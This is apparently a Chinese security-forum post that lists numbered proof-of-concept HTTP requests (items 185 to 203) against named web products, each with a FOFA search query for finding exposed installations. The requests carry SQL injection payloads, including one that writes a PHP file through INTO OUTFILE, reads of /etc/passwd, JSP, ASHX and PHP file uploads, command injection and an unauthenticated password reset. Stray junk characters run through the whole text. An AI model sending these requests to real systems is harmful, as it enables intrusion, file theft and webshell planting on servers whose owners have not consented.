, [/ l$ f( S# w# y9 ?5 QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0% r+ [9 o2 d. R0 z0 c. A
Accept: application/xml, text/xml, */*; q=0.01* G' Y6 c# i+ U( _2 _! q+ N; D
Content-Type: text/xml; charset=utf-8
. ~2 D5 @" q4 r3 F0 N# J* EAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, G0 ~* `! S5 C4 }
X-Requested-With: XMLHttpRequest
5 X3 Z9 Q% X. J9 C. z$ r+ i" D
0 U- M* ]# K% z1 \
8 F$ {8 @3 _6 Q9 f/ Z; i% Einsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')7 T/ f) {$ @: @- i# t' E
. w# E+ m8 P( x
/ d" H' [' r, c7 e+ D/ I185. 瑞友天翼应用虚拟化系统SQL注入
2 W3 `8 l0 R7 @9 s6 ~ W6 [version < 7.0.5.1
3 \# H0 c& c& R3 S% r qFOFA:app="REALOR-天翼应用虚拟化系统"
2 Q9 H5 `3 p& G! I/ P( ?GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1/ l/ m* h# x% F! Y& ?4 M; y% P
Host: host" M, F/ D1 J D: Z
- V ?3 M1 b2 p7 Z' c: O& r8 Z; _0 ?4 d% r+ z, n: j0 U! o6 R
186. F-logic DataCube3 SQL注入* O7 Q4 }5 N2 U, n' j
CVE-2024-31750; z! ~) w' _: |! L
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
; d) @7 A6 G. ?" hFOFA:title=="DataCube3"
$ w/ M$ x. X4 Q, B3 gPOST /admin/pr_monitor/getting_index_data.php HTTP/1.1
5 w8 z9 q* O/ p2 N: sHost: your-ip
" B) F3 i4 A t2 Z8 h( RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0& X- Q+ m% k6 X3 A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
( o2 o/ D5 l' F* w5 Q) fAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% o: I; E0 l3 q8 N' M9 H
Accept-Encoding: gzip, deflate; _" o, R; L; b" W1 _
Connection: close7 L1 o5 M5 m5 c$ N7 Z
Content-Type: application/x-www-form-urlencoded
( t. _+ ]6 X, c; ~' X. W' k; R' ]4 U+ ?2 x M
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450* O! F+ C6 @+ Z! K; d
2 y; B2 \ R3 | y& G+ H7 u* {
, q6 d0 E4 y8 J; j$ q4 `187. Mura CMS processAsyncObject SQL注入
3 b- K6 v7 H: Q6 D9 X) _CVE-2024-326408 l1 y3 C; D: B* z3 j+ Z2 I8 ^7 z2 b
FOFA:"Mura CMS"
: y; @- n; N) u: w6 CPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1* n$ B0 i5 r' I# h, j
Host: your-ip
6 O" ?( k) Y) Y" {8 _9 jContent-Type: application/x-www-form-urlencoded
' ~5 G/ R: M3 v# e* @4 ]
0 h# h' ^4 o# G/ n! I' b
7 H: @! m: a, ~' J% Hobject=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
9 A' e6 c1 o) \9 W1 v) v
3 [& {/ m" X' _+ l' l
4 B- P& a4 T' x4 N* O- U& E [188. 叁体-佳会视频会议 attachment 任意文件读取; g! p* F; k. W+ s* Y$ w1 k
version <= 3.9.70 r4 I6 j1 ?0 N7 g: w( Z& O F
FOFA:body="/system/get_rtc_user_defined_info?site_id"
7 [$ r8 X% I+ Q" r& y# sGET /attachment?file=/etc/passwd HTTP/1.1
3 S a* l7 L5 d+ S4 g: KHost: your-ip$ v, Z. t1 @% C( B4 X# b( K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
) T" c( F- ?# q4 M+ ?+ X- eAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% t7 B" F3 i$ ~/ e" a
Accept-Encoding: gzip, deflate, C/ j8 O! A2 a- G2 w
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
4 t, w6 O2 U9 b9 gConnection: close
) q/ \. |# h/ t2 d' ^7 s
# E4 U2 D4 E5 z. ]3 E! s) p. x
8 }7 G( S) c- Y: ?3 b& J1 i2 R189. 蓝网科技临床浏览系统 deleteStudy SQL注入6 l/ y5 S- x4 J) n$ ]7 V
FOFA:app="LANWON-临床浏览系统"
/ H! V& ^6 \* y2 I0 |! V$ iGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
% @. i& o% L& V9 ^0 LHost: your-ip
+ o1 V# N" \$ n- sUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
9 e4 i Y. q A, fAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.73 B* k& C4 _) g% N
Accept-Encoding: gzip, deflate9 h* `* a5 H: o& s
Accept-Language: zh-CN,zh;q=0.9
/ X- f) P; F/ MConnection: close+ y! r& S Y4 ?6 u# ^
5 @ W( J; Y8 T% P+ d) e1 j4 J
8 }* T G& Q* {) W Z- m6 N) j7 i. I190. 短视频矩阵营销系统 poihuoqu 任意文件读取
4 c D4 Q' c& [) HFOFA:title=="短视频矩阵营销系统"
" Y7 T. R1 d1 N0 }% g& n; z* `8 rPOST /index.php/admin/Userinfo/poihuoqu HTTP/2
# p: T3 N* P3 E, P8 xHost: your-ip, s# u$ Z( l' G) _8 Y) u7 z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.363 o5 j6 G: L- Y5 D( r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9. X: ~+ F' |: K" O) N. ~
Content-Type: application/x-www-form-urlencoded
, q6 ?4 M# j5 l/ {/ BAccept-Encoding: gzip, deflate
( w# q& m" T Y; P8 |6 M0 }Accept-Language: zh-CN,zh;q=0.98 f, l/ y" O0 D9 i* Z- |
' q6 v5 G9 w c# t
poi=file:///etc/passwd1 X/ q( t! S5 ~
7 e4 p+ K) ~" a. J5 O. v
; P/ k. k3 f6 A' F( f. c191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入5 ] I+ \5 R' e% p8 r* m
FOFA:body="/CDGServer3/index.jsp"
5 j9 ^, i; {9 P% `POST /CDGServer3/js/../NavigationAjax HTTP/1.1- F& i3 L# g" i. r7 u7 u
Host: your-ip8 o$ ]9 a0 O# o, ]2 a; ^# p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5 k# `# \' U8 y* `; Q) BContent-Type: application/x-www-form-urlencoded2 z) z# j& c9 H
& S! y9 R0 O5 L ~/ A$ acommand=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
3 E# I' ?" l. K( |; T" a* ~' [& V) E1 ^9 M0 b* w4 X9 t
5 G; z- a: I4 _8 }3 I192. 富通天下外贸ERP UploadEmailAttr 任意文件上传& B" s/ X2 m7 u* g) j5 u. H8 Z
FOFA:title="用户登录_富通天下外贸ERP"
) W5 Y* a; Y. W6 i8 `) XPOST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
$ u2 z. \5 ^. w( GHost: your-ip
& \( U, H: K! ^4 Q! }1 V; JUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.369 D6 R0 b0 x& F; ^/ b) i& q
Content-Type: application/x-www-form-urlencoded+ ]& M' t# } z% r
% \1 q8 o- o( ?8 B% e1 q$ M* K7 I- O( C/ O1 P
<% @ webhandler language="C#" class="AverageHandler" %>; V" W$ f& ^9 h9 x6 u( W
using System;; H# L$ u3 R( M# C% T8 t
using System.Web;
$ e2 Y# k( ` F, w8 u/ b$ J1 wpublic class AverageHandler : IHttpHandler0 t7 u, Y" S4 v2 \. c& E7 O
{
" s8 Z- m. M# S/ f+ b6 Z* ~public bool IsReusable
" x/ j& Y0 T& `5 \: x{ get { return true; } }
0 u& e% \1 T6 ~% \public void ProcessRequest(HttpContext ctx). C4 c# U0 b" o8 D3 z' v ~
{; H5 N: b9 d) I+ Y m2 b2 ?9 |
ctx.Response.Write("test");
1 [2 I1 H* ~7 k! k" M- j7 H}
) w0 e9 d! } a, N1 F( B}
: y6 `/ ]$ R4 f; |! n, F B% F: s! w8 c" r) r
6 ]6 p/ d- O) ~1 R( L0 b) G1 v193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行. L/ N* |+ ^: j3 Y
FOFA:body="山石云鉴主机安全管理系统"% d/ O' P: u% A
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
8 w' k8 x" |3 p9 G- ^Host:
2 q2 c, G- @4 lCookie: PHPSESSID=2333333333333;
! E" }- R m$ r0 ?& d4 b5 `Content-Type: application/x-www-form-urlencoded
- s5 Y4 e3 r3 l' p4 r) M! p. hUser-Agent: Mozilla/5.0
* j5 o* S8 i1 [1 E9 {- q% O# D$ V. ?. Z, X
* I4 Q/ H4 i2 D7 `5 ^POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
! N8 q- N; J- tHost:
) X, m" h7 B* |- s6 I kUser-Agent: Mozilla/5.0
j$ I9 _! }0 C, A6 ^9 tAccept-Encoding: gzip, deflate
# Q! M9 b9 t' o# l; PAccept: */*
& F1 Q3 M4 i: D" F. N: zConnection: close+ b9 l, E, ^6 M
Cookie: PHPSESSID=2333333333333;+ `# `1 g Q* I) q
Content-Type: application/x-www-form-urlencoded) y: P& p3 C) g( `3 a' j1 ^
Content-Length: 84
/ v; O0 A% `4 p
4 b4 c* g; e2 A, B3 E* N; n& Wparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
0 z6 b6 [2 ?. ?& `, c- g3 I; G9 q; \
6 {! |" {4 {) @* S8 r' x
GET /master/img/config HTTP/1.1
@* Q' N- |4 |0 \Host:
1 u4 G$ w j/ Z! `! h) [User-Agent: Mozilla/5.0
) u: ?3 ?! E' b# j; X
5 e$ p* R+ c6 k2 M% G8 U
5 i! D, ~( x' F5 ^) p# q194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
) s, l5 D+ A9 B1 RFOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
* T0 F3 k5 J% T% N; n) J
& l$ u% n! U4 f5 R; _" {4 g8 wPOST /servlet/uploadAttachmentServlet HTTP/1.1$ L5 m& _2 F5 q, q" d; O9 z. q
Host: host6 g) a$ @( l3 @. ^' x0 Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 T/ C% @5 L4 D: i% G6 e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
$ _9 E1 d- ?, z, YAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ _4 j& J$ E$ [/ J, R |Accept-Encoding: gzip, deflate
5 S% C3 Y8 V1 t& G5 JConnection: close
/ T# D% a0 P- i% fContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
9 p4 ?2 M) g: F; S1 r0 M------WebKitFormBoundaryKNt0t4vBe8cX9rZk. F: J D" j/ m, J1 @; f
; i! _3 b; ~2 W
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
6 C V, G5 V: ]7 {3 T# JContent-Type: text/plain
# H2 F* n7 i1 g6 ]. m<% out.println("hello");%>
( l! W) s7 T5 y7 A3 S$ u. R. v5 p------WebKitFormBoundaryKNt0t4vBe8cX9rZk
& ^ v/ S$ _" @: ~2 O, kContent-Disposition: form-data; name="json"5 ^* ~4 c% Z/ r: r2 }
{"iq":{"query":{"UpdateType":"mail"}}}# p j9 Y4 ?6 C7 n
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
1 e$ E8 L, i9 O7 r E% M9 a9 s- \4 ]) z# _2 r: h" n4 f3 N9 O
# ^- M u. b! B% Q* }195. 飞鱼星上网行为管理系统 send_order.cgi命令执行* X* V0 b6 n& Y+ E9 j+ o
FOFA:title=="飞鱼星企业级智能上网行为管理系统3 N3 a5 [* ?$ A6 M; B3 L/ Z7 U o3 ?& ^
POST /send_order.cgi?parameter=operation HTTP/1.1
7 O8 |! M+ [; ?0 WHost: 127.0.0.1
+ I7 l% t5 r; {* K) H: pPragma: no-cache
$ [5 Y2 `1 Y: `+ L( ]Cache-Control: no-cache2 X% z2 k( j3 E. U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36+ Z9 V! b* @' V: g# Z$ [
Accept: */*
! t0 Z! u( V0 Z; YAccept-Encoding: gzip, deflate
, Y, `' u8 f' P) YAccept-Language: zh-CN,zh;q=0.9
4 c, ]# A# \7 g0 f ]Connection: close$ ?! P8 f5 M. y
Content-Type: application/x-www-form-urlencoded( v* J1 H( a) I) ~6 n
Content-Length: 68! u+ M1 k3 [6 j5 w
2 n# Q( \* ~& v, I- @" K& v
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}' Q! L8 V* N2 A3 j
+ O9 o9 T8 C! v8 W. U
1 q% d. s8 z7 @( ^
196. 河南省风速科技统一认证平台密码重置: E2 P- s: F" r' q. [
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"+ w* I4 [. u( K- n' k& s1 q1 x
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
# M& ?& J! N$ {( ]7 V$ ?9 V. z: LUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.369 [. J. y7 D7 W. M# g' o [$ g3 D
Content-Type: application/json;charset=UTF-81 w- s& d) Q) M W2 j$ A& A
X-Requested-With: XMLHttpRequest9 S F; V. M+ w0 V! @
Host:: n4 ?+ @& G7 B# R6 s9 \6 h
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2+ d0 j: S1 x( r7 B& k/ X( h0 t
Content-Length: 451 R0 L9 s0 R5 c. U! T6 W
Connection: close
9 h; F- S+ d2 S/ A* Q, _$ p/ @) t8 U: ^" U; N
{"xgh":"test","newPass":"test666","email":""}" U9 r) Y2 o: c8 A0 `$ ?. j
3 G0 W' |1 _. u A
) j* o1 Y) M# C6 A
* R8 r" @3 i6 V1 }# G5 I8 W197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入% m4 a0 Y5 I7 z! K
FOFA:app="浙大恩特客户资源管理系统"
+ K* c! y% C: \ e9 N8 G' qGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
; Y9 T$ n; X1 m5 Z( ?! KHost:
4 ^- q2 ?. T$ E; l+ S9 xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36! y! m/ Q! L( H5 ^) @
Accept-Encoding: gzip, deflate1 x: U3 j9 i6 o' D2 z
Connection: close, B; F5 O+ O4 W1 J7 s4 n
, M- M9 p$ P( R& o/ Z
8 z2 U& c4 n! _3 d- I( b
* L0 b3 ^ V7 L7 T4 P198. 阿里云盘 WebDAV 命令注入
- h$ q" a0 g# @- M: T& nCVE-2024-29640
4 T, F# z( w. c# J! L# i7 l% Q% b/ J( WGET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1* \2 _) N( j9 y
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
. Z! L; L1 E. l1 {9 b0 RAccept: */*2 W" u6 Z/ I8 f3 v! V7 m# m: h J
Accept-Encoding: gzip, deflate
7 {$ Q5 [+ R4 o3 z- GAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.61 ~8 G; R, \3 O6 W1 {) u
Connection: close
. _# B4 E9 g; j* T) D9 w3 p/ I# R5 `& B1 D3 G
+ e4 @: U( }. _- c199. cockpit系统assetsmanager_upload接口 文件上传
: g9 n4 I* H. V+ R ~+ V% X) Q5 i5 @
1 F" [5 v0 O8 V% ]1 B4 C1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
4 K- Q; a1 F6 X* x5 AGET /auth/login?to=/ HTTP/1.18 A! G- e$ w q. s& s2 Y
' _3 I+ q/ M( v( u2 V! |' w7 J
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"6 j( K/ P) D- L( u" T( z3 E
5 J i; H% z" B4 ]; L2.使用刚才上一步获取到的jwt获取cookie:
7 a! b7 P( L# Q) D+ u4 |7 b" @' G% c) ]/ F3 d$ j9 n
POST /auth/check HTTP/1.1( C4 U# }, k7 L8 |) U
Content-Type: application/json
& u0 a# w- _- x; ^ i- X4 A6 p7 n) f5 n2 T% X0 _# G
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
% G8 H1 d5 j" \. W4 [0 @" c2 a. ^9 `. \6 M9 r) p, ?3 U) ]% H( y
响应:200,返回值:9 |" u5 T" ]0 E; n! G0 e/ ^
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
9 U5 a/ L2 Q7 tFofa:title="Authenticate Please!"
" T7 r+ G" p0 d' W) v6 uPOST /assetsmanager/upload HTTP/1.1
$ C$ B+ u7 Z; F7 A' [Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3* y) B# `4 e% c6 p) m
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92. }8 {$ s: ]7 u4 t- }. U/ w. x9 j6 k8 S
* ~: x2 v$ ^+ v5 r2 g! W; j
-----------------------------36D28FBc36bd6feE7Fb3 d6 j0 s0 d2 a' x( q2 @
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
1 `) Z8 N# z2 u. L* h! J" dContent-Type: text/php4 X1 ]+ n% r" B: ]
, X/ S4 W5 i# |+ z' y' ?9 B<?php echo "tttt";unlink(__FILE__);?>
; m# k: x! ^3 B4 h-----------------------------36D28FBc36bd6feE7Fb3
; h9 ^. `2 x6 ?' l5 Q9 kContent-Disposition: form-data; name="folder"
+ w! _ o& t" W& G4 w, w) L, ^- y7 B
-----------------------------36D28FBc36bd6feE7Fb3--
% J/ q3 X! {% H$ W; v3 l7 @8 L+ P
' P T! ~$ H% n# j& w( D& T N- u
/storage/uploads/tttt.php
- Y$ G8 ?% B3 `2 n# I) X( P/ y8 P, Y, w' [" H
200. SeaCMS海洋影视管理系统dmku SQL注入0 b( W6 b7 E. i" ]5 c
FOFA:app="海洋CMS"
% w7 K, [2 ~6 X: w4 x7 `GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
+ R" Y5 a( \- I- ]& xCookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
' E- G& z+ A [/ Z/ PUpgrade-Insecure-Requests: 1
0 V5 B' I8 B7 t% R: n% CCache-Control: max-age=0
$ P) ^; z. L5 c* c% oAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
C7 C1 F8 X/ P$ E* L. tAccept-Encoding: gzip, deflate) K" u1 _: U2 t4 k0 X3 \
Accept-Language: zh-CN,zh;q=0.9
6 H# } B3 p( ?' {2 J- ?+ K, ]8 p$ }
& H% p) b# z+ m2 ~
; Q0 T- u" g9 `) K2 g201. 方正全媒体新闻采编系统 binary SQL注入
$ t4 C7 p! L) |FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统". w6 j, o5 r# x& v5 p2 t2 \$ W
POST /newsedit/newsplan/task/binary.do HTTP/1.1
7 \7 l8 T( l/ |4 A9 qContent-Type: application/x-www-form-urlencoded
. e/ r9 Q( n, p$ o0 I, Z, r. JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: H2 H& r9 z8 k7 g/ _Accept-Encoding: gzip, deflate1 p+ s+ K) _! b4 x+ C: a
Accept-Language: zh-CN,zh;q=0.9: m U' s/ r5 @
Connection: close
4 V& z( }2 i, W+ }" P8 d* p8 c$ H4 S! E
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1# ]9 Q& K$ K7 P2 ]
1 J- j; D) h8 R, `3 z
0 c" e: @: r+ F5 e. J202. 微擎系统 AccountEdit任意文件上传; h6 u ]: |$ h, p2 S' u
FOFA:body="/Widgets/WidgetCollection/", o7 V9 h+ y# t. S+ w- |
获取__VIEWSTATE和__EVENTVALIDATION值
, c) g2 y* j& H4 E2 w: i/ [GET /User/AccountEdit.aspx HTTP/1.1
6 J& f' a2 _% S# {# h& ]( CHost: 滑板人之家2 c8 v$ d3 M" s' A) c/ S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
6 T) J' D6 t" k4 H- W8 hContent-Length: 0
& v! o/ n. S. Y# m) g# A; W5 C& Z0 v* \ b/ t
6 I$ e# A& e8 i4 H6 q替换__VIEWSTATE和__EVENTVALIDATION值
/ ~4 i3 g, | I+ E2 G+ k2 ~3 bPOST /User/AccountEdit.aspx HTTP/1.1
$ g6 k* X2 i2 {" r2 v: }$ q4 ]& wAccept-Encoding: gzip, deflate, br9 N9 ~, m6 O1 E: ]8 ?. k9 p
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
* W7 r; l! W9 H6 n$ a; M" Z
2 q5 o# S# w+ k7 h. r) F. H/ f-----------------------------786435874t38587593865736587346567358735687# Y) ]6 Y- h( L J, Q$ r% U2 i" w' ?
Content-Disposition: form-data; name="__VIEWSTATE"
, `% J* d' e' @" k
% Z" q1 H- g5 x% j3 Y__VIEWSTATE! z& V# \- Q! p6 O
-----------------------------786435874t38587593865736587346567358735687$ j1 S5 o0 _% [( o
Content-Disposition: form-data; name="__EVENTVALIDATION"" u2 X& L# A5 w0 i. E5 q( F# F
4 r& [* F0 [6 U: l% V4 d5 g9 Q: B
__EVENTVALIDATION2 F2 f0 v) U6 b6 s/ D$ A3 ?9 g
-----------------------------786435874t38587593865736587346567358735687
! u: r5 G1 [* I9 Y, ?Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
. m9 U s- @. X7 `4 lContent-Type: text/plain- ~8 o( ^, y3 c/ ~. }
% N9 g2 e5 O1 b( O, r! q8 W+ v
Hello World!: p/ x4 B* i* ]( |
-----------------------------786435874t38587593865736587346567358735687
" _9 X" e8 V5 U) V7 m2 rContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"; R4 H# B% F+ h7 z
% G1 }: T: x8 s4 H0 r
上传图片
6 e: f# {. o: n+ ~$ B6 u-----------------------------786435874t38587593865736587346567358735687+ k, d6 I6 f: e
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"& _2 l5 G" A+ o9 d) }! R
3 X0 L( Z: O3 D
5 C, r4 |; o* s. _- b; E4 A; c" B-----------------------------786435874t38587593865736587346567358735687
8 l( y5 P |1 W8 m* eContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"- K. n3 V0 g( l
" U. Y6 z5 d7 O( p, A
2 N) R( r" y& a; `2 o. U7 ^" ~-----------------------------786435874t38587593865736587346567358735687--
N) h1 k1 }; P8 ?7 z; G$ r8 o. W8 T% @. A
" G: `+ h( T% K6 D% v
/_data/Uploads/1123.txt2 Q, o+ V, g5 b0 Z* G
4 \0 T2 W: d3 L
203. 红海云EHR PtFjk 文件上传" t: E r3 G1 H. S& L D/ @1 r
FOFA:body="RedseaPlatform"
$ s5 M, O( e$ n+ b& A2 k/ ?POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.13 C8 [. n; E5 \
Host: x.x.x.x% W* v# F8 `) F. H6 w" B, m/ {
Accept-Encoding: gzip: Q: Z6 R- j0 Q; k! S# a( `
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
) ~( P; P8 Z* g- t8 F: }, A- d; nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4$ w8 r5 \9 B, T2 p( D5 T
Content-Length: 210
6 p f$ k) {, z# T- W
6 a: X; ]% M) g9 ^------WebKitFormBoundaryt7WbDl1tXogoZys4
( `0 r# M; ^; C: U4 k) a' [Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Y6 X J. { G+ t: L6 [Content-Type:image/jpeg9 M- [" O- Y& M3 V( l9 ~
- r. a2 L) h+ X3 v* f$ j<% out.print("hello,eHR");%>
: i" a+ B- |* I------WebKitFormBoundaryt7WbDl1tXogoZys4--
+ m, m$ Q1 t- o2 V8 v$ T' a- y, f
$ l7 {& C/ ^7 L" _+ w$ n8 P" K: R
4 u( e# J7 S, i; n# m
6 `! `1 k+ j' e$ Q5 `! X" w# M2 p
# h3 P& \0 Q! L: J
. Q0 s1 j- M& B% c# ~; D" ^3 S4 @6 h. R3 ^7 H, V
|
发表于 2024-6-5 14:31:29
收藏
支持
反对